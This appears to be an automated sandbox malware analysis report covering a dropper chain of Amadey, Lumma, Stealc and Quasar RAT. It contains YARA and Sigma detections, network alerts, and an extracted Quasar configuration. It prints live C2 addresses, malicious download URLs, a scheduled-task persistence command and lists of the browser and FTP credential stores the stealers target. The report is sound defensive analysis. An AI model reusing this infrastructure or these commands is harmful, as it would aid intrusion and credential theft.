26.2.28qbTrm.exe.4219970.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
26.2.28qbTrm.exe.4219970.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28d0d8:$x1: Quasar.Common.Messages 0x29d401:$x1: Quasar.Common.Messages 0x2a9a12:$x4: Uninstalling... good bye :-( 0x2ab207:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
26.2.28qbTrm.exe.4219970.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2a8fc4:$f1: FileZilla\recentservers.xml 0x2a9004:$f2: FileZilla\sitemanager.xml 0x2a9046:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2a9292:$b1: Chrome\User Data\ 0x2a92e8:$b1: Chrome\User Data\ 0x2a95c0:$b2: Mozilla\Firefox\Profiles 0x2a96bc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fb618:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2a9814:$b4: Opera Software\Opera Stable\Login Data 0x2a98ce:$b5: YandexBrowser\User Data\ 0x2a993c:$b5: YandexBrowser\User Data\ 0x2a9610:$s4: logins.json 0x2a9346:$a1: username_value 0x2a9364:$a2: password_value 0x2a9650:$a3: encryptedUsername 0x2fb55c:$a3: encryptedUsername 0x2a9674:$a4: encryptedPassword 0x2fb57a:$a4: encryptedPassword 0x2fb4f8:$a5: httpRealm
26.2.28qbTrm.exe.4219970.0.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x163116:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2a9afc:$s3: Process already elevated. 0x28cdd7:$s4: get_PotentiallyVulnerablePasswords 0x276e93:$s5: GetKeyloggerLogsDirectory 0x29cb60:$s5: GetKeyloggerLogsDirectory 0x28cdfa:$s6: set_PotentiallyVulnerablePasswords 0x2fcc46:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
26.2.28qbTrm.exe.4219970.0.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
26.2.28qbTrm.exe.4219970.0.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x28eed8:$x1: Quasar.Common.Messages 0x29f201:$x1: Quasar.Common.Messages 0x2ab812:$x4: Uninstalling... good bye :-( 0x2ad007:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
26.2.28qbTrm.exe.4219970.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2aadc4:$f1: FileZilla\recentservers.xml 0x2aae04:$f2: FileZilla\sitemanager.xml 0x2aae46:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x2ab092:$b1: Chrome\User Data\ 0x2ab0e8:$b1: Chrome\User Data\ 0x2ab3c0:$b2: Mozilla\Firefox\Profiles 0x2ab4bc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2fd418:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2ab614:$b4: Opera Software\Opera Stable\Login Data 0x2ab6ce:$b5: YandexBrowser\User Data\ 0x2ab73c:$b5: YandexBrowser\User Data\ 0x2ab410:$s4: logins.json 0x2ab146:$a1: username_value 0x2ab164:$a2: password_value 0x2ab450:$a3: encryptedUsername 0x2fd35c:$a3: encryptedUsername 0x2ab474:$a4: encryptedPassword 0x2fd37a:$a4: encryptedPassword 0x2fd2f8:$a5: httpRealm
26.2.28qbTrm.exe.4219970.0.raw.unpack	MALWARE_Win_QuasarStealer	Detects Quasar infostealer	ditekshen	0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null 0x2ab8fc:$s3: Process already elevated. 0x28ebd7:$s4: get_PotentiallyVulnerablePasswords 0x278c93:$s5: GetKeyloggerLogsDirectory 0x29e960:$s5: GetKeyloggerLogsDirectory 0x28ebfa:$s6: set_PotentiallyVulnerablePasswords 0x2fea46:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe, ProcessId: 7620, TargetFilename: C:\Users\user\AppData\Roaming\SubDir\services.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\SubDir\services.exe", CommandLine: "C:\Users\user\AppData\Roaming\SubDir\services.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\SubDir\services.exe, NewProcessName: C:\Users\user\AppData\Roaming\SubDir\services.exe, OriginalFileName: C:\Users\user\AppData\Roaming\SubDir\services.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe", ParentImage: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe, ParentProcessId: 7620, ParentProcessName: 28qbTrm.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\SubDir\services.exe", ProcessId: 7388, ProcessName: services.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe", ParentImage: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe, ParentProcessId: 3428, ParentProcessName: K1T78D2510W1E77KV3WDUQ9M.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 6944, ProcessName: chrome.exe

Sigma detected: Conhost Spawned By Uncommon Parent Process

Source: Process started

Author: Tim Rauch: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\SubDir\services.exe", ParentImage: C:\Users\user\AppData\Roaming\SubDir\services.exe, ParentProcessId: 7388, ParentProcessName: services.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 7444, ProcessName: conhost.exe

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\services.exe" /rl HIGHEST /f, CommandLine: "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\services.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe", ParentImage: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe, ParentProcessId: 7620, ParentProcessName: 28qbTrm.exe, ProcessCommandLine: "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\services.exe" /rl HIGHEST /f, ProcessId: 7752, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\AppData\Roaming\SubDir\services.exe", CommandLine: "C:\Users\user\AppData\Roaming\SubDir\services.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\SubDir\services.exe, NewProcessName: C:\Users\user\AppData\Roaming\SubDir\services.exe, OriginalFileName: C:\Users\user\AppData\Roaming\SubDir\services.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe", ParentImage: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe, ParentProcessId: 7620, ParentProcessName: 28qbTrm.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\SubDir\services.exe", ProcessId: 7388, ProcessName: services.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:22:38.845064+0100	2028371	3	Unknown Traffic	192.168.2.4	50086	104.21.23.62	443	TCP
2025-02-15T17:22:45.860458+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	104.21.96.1	443	TCP
2025-02-15T17:22:46.707824+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.96.1	443	TCP
2025-02-15T17:22:48.066307+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.96.1	443	TCP
2025-02-15T17:22:49.556173+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.96.1	443	TCP
2025-02-15T17:22:50.787183+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	104.21.96.1	443	TCP
2025-02-15T17:22:52.554507+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	104.21.96.1	443	TCP
2025-02-15T17:22:54.186663+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	104.21.96.1	443	TCP
2025-02-15T17:22:57.306076+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.96.1	443	TCP
2025-02-15T17:24:15.451247+0100	2028371	3	Unknown Traffic	192.168.2.4	49963	172.67.209.219	443	TCP
2025-02-15T17:24:16.430094+0100	2028371	3	Unknown Traffic	192.168.2.4	49969	172.67.209.219	443	TCP
2025-02-15T17:24:17.435123+0100	2028371	3	Unknown Traffic	192.168.2.4	49978	172.67.209.219	443	TCP
2025-02-15T17:24:23.344121+0100	2028371	3	Unknown Traffic	192.168.2.4	50019	172.67.209.219	443	TCP
2025-02-15T17:24:24.530728+0100	2028371	3	Unknown Traffic	192.168.2.4	50029	172.67.209.219	443	TCP
2025-02-15T17:24:26.035712+0100	2028371	3	Unknown Traffic	192.168.2.4	50041	172.67.209.219	443	TCP
2025-02-15T17:24:27.404020+0100	2028371	3	Unknown Traffic	192.168.2.4	50051	172.67.209.219	443	TCP
2025-02-15T17:24:29.824334+0100	2028371	3	Unknown Traffic	192.168.2.4	50062	172.67.209.219	443	TCP
2025-02-15T17:24:44.965681+0100	2028371	3	Unknown Traffic	192.168.2.4	50076	104.21.23.62	443	TCP
2025-02-15T17:24:45.882439+0100	2028371	3	Unknown Traffic	192.168.2.4	50078	104.21.23.62	443	TCP
2025-02-15T17:24:49.165826+0100	2028371	3	Unknown Traffic	192.168.2.4	50080	104.21.23.62	443	TCP
2025-02-15T17:24:50.465121+0100	2028371	3	Unknown Traffic	192.168.2.4	50081	104.21.23.62	443	TCP
2025-02-15T17:24:51.724326+0100	2028371	3	Unknown Traffic	192.168.2.4	50082	104.21.23.62	443	TCP
2025-02-15T17:24:53.013765+0100	2028371	3	Unknown Traffic	192.168.2.4	50083	104.21.23.62	443	TCP
2025-02-15T17:24:56.590916+0100	2028371	3	Unknown Traffic	192.168.2.4	50085	104.21.23.62	443	TCP

ET MALWARE LUMAR Stealer Exfiltration M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:24:42.498135+0100	2048736	1	A Network Trojan was detected	192.168.2.4	50075	185.244.212.106	2227	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:22:46.019955+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	104.21.96.1	443	TCP
2025-02-15T17:22:47.197012+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	104.21.96.1	443	TCP
2025-02-15T17:22:57.669407+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49738	104.21.96.1	443	TCP
2025-02-15T17:24:15.945437+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49963	172.67.209.219	443	TCP
2025-02-15T17:24:16.811816+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49969	172.67.209.219	443	TCP
2025-02-15T17:24:31.964235+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50062	172.67.209.219	443	TCP
2025-02-15T17:24:45.421728+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50076	104.21.23.62	443	TCP
2025-02-15T17:24:48.493813+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50078	104.21.23.62	443	TCP
2025-02-15T17:24:59.284149+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50086	104.21.23.62	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:22:46.019955+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49731	104.21.96.1	443	TCP
2025-02-15T17:24:15.945437+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49963	172.67.209.219	443	TCP
2025-02-15T17:24:45.421728+0100	2049836	1	A Network Trojan was detected	192.168.2.4	50076	104.21.23.62	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (friendseforever .help in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:22:45.860458+0100	2060101	1	Domain Observed Used for C2 Detected	192.168.2.4	49731	104.21.96.1	443	TCP
2025-02-15T17:22:46.707824+0100	2060101	1	Domain Observed Used for C2 Detected	192.168.2.4	49732	104.21.96.1	443	TCP
2025-02-15T17:22:48.066307+0100	2060101	1	Domain Observed Used for C2 Detected	192.168.2.4	49733	104.21.96.1	443	TCP
2025-02-15T17:22:49.556173+0100	2060101	1	Domain Observed Used for C2 Detected	192.168.2.4	49734	104.21.96.1	443	TCP
2025-02-15T17:22:50.787183+0100	2060101	1	Domain Observed Used for C2 Detected	192.168.2.4	49735	104.21.96.1	443	TCP
2025-02-15T17:22:52.554507+0100	2060101	1	Domain Observed Used for C2 Detected	192.168.2.4	49736	104.21.96.1	443	TCP
2025-02-15T17:22:54.186663+0100	2060101	1	Domain Observed Used for C2 Detected	192.168.2.4	49737	104.21.96.1	443	TCP
2025-02-15T17:22:57.306076+0100	2060101	1	Domain Observed Used for C2 Detected	192.168.2.4	49738	104.21.96.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (shiningrstars .help in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:24:15.451247+0100	2060105	1	Domain Observed Used for C2 Detected	192.168.2.4	49963	172.67.209.219	443	TCP
2025-02-15T17:24:16.430094+0100	2060105	1	Domain Observed Used for C2 Detected	192.168.2.4	49969	172.67.209.219	443	TCP
2025-02-15T17:24:17.435123+0100	2060105	1	Domain Observed Used for C2 Detected	192.168.2.4	49978	172.67.209.219	443	TCP
2025-02-15T17:24:23.344121+0100	2060105	1	Domain Observed Used for C2 Detected	192.168.2.4	50019	172.67.209.219	443	TCP
2025-02-15T17:24:24.530728+0100	2060105	1	Domain Observed Used for C2 Detected	192.168.2.4	50029	172.67.209.219	443	TCP
2025-02-15T17:24:26.035712+0100	2060105	1	Domain Observed Used for C2 Detected	192.168.2.4	50041	172.67.209.219	443	TCP
2025-02-15T17:24:27.404020+0100	2060105	1	Domain Observed Used for C2 Detected	192.168.2.4	50051	172.67.209.219	443	TCP
2025-02-15T17:24:29.824334+0100	2060105	1	Domain Observed Used for C2 Detected	192.168.2.4	50062	172.67.209.219	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:24:12.927951+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49942	185.215.113.43	80	TCP
2025-02-15T17:24:17.155046+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49973	185.215.113.43	80	TCP
2025-02-15T17:24:23.423464+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50017	185.215.113.43	80	TCP
2025-02-15T17:24:35.717080+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50069	185.215.113.43	80	TCP
2025-02-15T17:24:39.716263+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50071	185.215.113.43	80	TCP
2025-02-15T17:24:45.534350+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50077	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (friendseforever .help)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:22:45.369342+0100	2060100	1	Domain Observed Used for C2 Detected	192.168.2.4	53333	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shiningrstars .help)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:24:14.910171+0100	2060104	1	Domain Observed Used for C2 Detected	192.168.2.4	52644	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:23:06.117626+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.115	80	192.168.2.4	49745	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:23:05.882849+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49745	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:23:06.337627+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49745	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:23:07.539071+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49745	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:23:06.436133+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.115	80	192.168.2.4	49745	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:22:50.027878+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49734	104.21.96.1	443	TCP
2025-02-15T17:24:26.537685+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	50041	172.67.209.219	443	TCP
2025-02-15T17:24:49.965041+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	50080	104.21.23.62	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:23:05.656851+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49745	185.215.113.115	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:24:05.982071+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49893	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:24:12.194316+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49907	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:24:09.311051+0100	2803305	3	Unknown Traffic	192.168.2.4	49917	185.215.113.75	80	TCP
2025-02-15T17:24:13.654757+0100	2803305	3	Unknown Traffic	192.168.2.4	49948	185.215.113.75	80	TCP
2025-02-15T17:24:17.861422+0100	2803305	3	Unknown Traffic	192.168.2.4	49980	185.215.113.75	80	TCP
2025-02-15T17:24:24.195300+0100	2803305	3	Unknown Traffic	192.168.2.4	50023	185.215.113.75	80	TCP
2025-02-15T17:24:36.700384+0100	2803305	3	Unknown Traffic	192.168.2.4	50070	185.215.113.75	80	TCP
2025-02-15T17:24:40.507333+0100	2803305	3	Unknown Traffic	192.168.2.4	50073	185.215.113.75	80	TCP
2025-02-15T17:24:46.240211+0100	2803305	3	Unknown Traffic	192.168.2.4	50079	185.215.113.75	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-15T17:23:08.017116+0100	2803304	3	Unknown Traffic	192.168.2.4	49745	185.215.113.115	80	TCP
2025-02-15T17:23:21.243145+0100	2803304	3	Unknown Traffic	192.168.2.4	49768	185.215.113.115	80	TCP
2025-02-15T17:23:22.365235+0100	2803304	3	Unknown Traffic	192.168.2.4	49768	185.215.113.115	80	TCP
2025-02-15T17:23:23.006657+0100	2803304	3	Unknown Traffic	192.168.2.4	49768	185.215.113.115	80	TCP
2025-02-15T17:23:23.741740+0100	2803304	3	Unknown Traffic	192.168.2.4	49768	185.215.113.115	80	TCP
2025-02-15T17:23:25.538238+0100	2803304	3	Unknown Traffic	192.168.2.4	49768	185.215.113.115	80	TCP
2025-02-15T17:23:25.956649+0100	2803304	3	Unknown Traffic	192.168.2.4	49768	185.215.113.115	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: random.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://shiningrstars.help/apidB	Avira URL Cloud: Label: malware
Source: https://friendseforever.help/apiakif	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/7914816047/KQlljCB.exe	Avira URL Cloud: Label: malware
Source: https://shiningrstars.help:443/apiCLSID	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlla	Avira URL Cloud: Label: malware
Source: https://shiningrstars.help/apiz	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/8029815729/28qbTrm.exe	Avira URL Cloud: Label: malware
Source: https://shiningrstars.help/z	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phprowser	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php_L	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/softokn3.dlld	Avira URL Cloud: Label: malware
Source: https://friendseforever.help:443/apiOI	Avira URL Cloud: Label: malware
Source: 185.215.113.115/c4becf79229cb002.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phptware	Avira URL Cloud: Label: malware
Source: https://shiningrstars.help/apiA	Avira URL Cloud: Label: malware
Source: http://185.215.113.75/files/6960404221/w3Xwk4R.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/softokn3.dllB	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpser	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/mozglue.dllI	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php8	Avira URL Cloud: Label: malware
Source: https://friendseforever.help/apie=	Avira URL Cloud: Label: malware
Source: https://friendseforever.help/m	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php9	Avira URL Cloud: Label: malware
Source: https://friendseforever.help/	Avira URL Cloud: Label: malware
Source: https://shiningrstars.help/	Avira URL Cloud: Label: malware
Source: https://friendseforever.help/apiEMHEM	Avira URL Cloud: Label: malware
Source: https://friendseforever.help/apiw	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/mozglue.dllm	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpa	Avira URL Cloud: Label: malware
Source: https://shiningrstars.help/api	Avira URL Cloud: Label: malware
Source: https://friendseforever.help/9	Avira URL Cloud: Label: malware
Source: https://friendseforever.help/cK7	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\0LGvvQO[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen3
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\kzTq7Bt[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\spoDnGT[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Found malware configuration

Source: 00000003.00000002.1934104758.0000000000A31000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000001A.00000002.2767895284.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": ["195.177.95.118:4782"], "SubDirectory": "SubDir", "InstallName": "services.exe", "MutexName": "6596bd7c-1ad4-4c84-8564-65c9aa359b6d", "StartupKey": "Windows Startup", "Tag": "F2CviXz", "LogDirectoryName": "Logs", "ServerSignature": "uG6V9ZjF+W2FFEucdBCY+sy05hBVSYqEak644K8tisH2YWFD/mA5VaF0j+dXYzqDcgRVY6t4uWWUfcAkvxQVuCwmjWKAp7N/GtVBTaXfoG/zPyA+wufKDAmlh+W6tP9RgctHR4KIE2BFLmFDhjB6P36Udpcy5eBalpqYnhH4Jd/1KczkKHEJCbXCT0kFMPuuCg1/OGoZ5QlEF9bUEPapHc5dG3OF+NmvArWO8ec2gWNU9KC+kl2sitz7VglDdvudTzgrKhuAlwJkkaYinFW7V9sE/vWA5ieJ1d+QMaWcJa1+MJQFgcf3ypEouKSwa79MUzN0glV9NhMGGncr8e53M7XQq3kIq8cdMyXsmOjhzDE9Ani/bmz5QXgY0q96/uSs+5V/C+Evkeo4DikVFE7DJBImPdHt4aEfw4iCBG40vXA6vT7ztVbNAJ/SQBqXod5qiZ7HtgmZSrPjyh5I310UPSlcEZGfyIJnzcD/B1OjkOWxep+JF/YvlP7bybl+ZUUC+FMROC/nus357n4VcrtlKKOGCqpZtfICSrAez0VmLF73dqbpjzW18w3QR/KMvarqOCXcHnuloUpmFHIep9rHfrD2HUgPKPzoFRmU7Bt7beoqmsvQRbySJKfW0eCK/5kXB4oqJ22B9CL207BW94tqTqAp4ELG1Ivge3d+/LTpsE0=", "ServerCertificate": 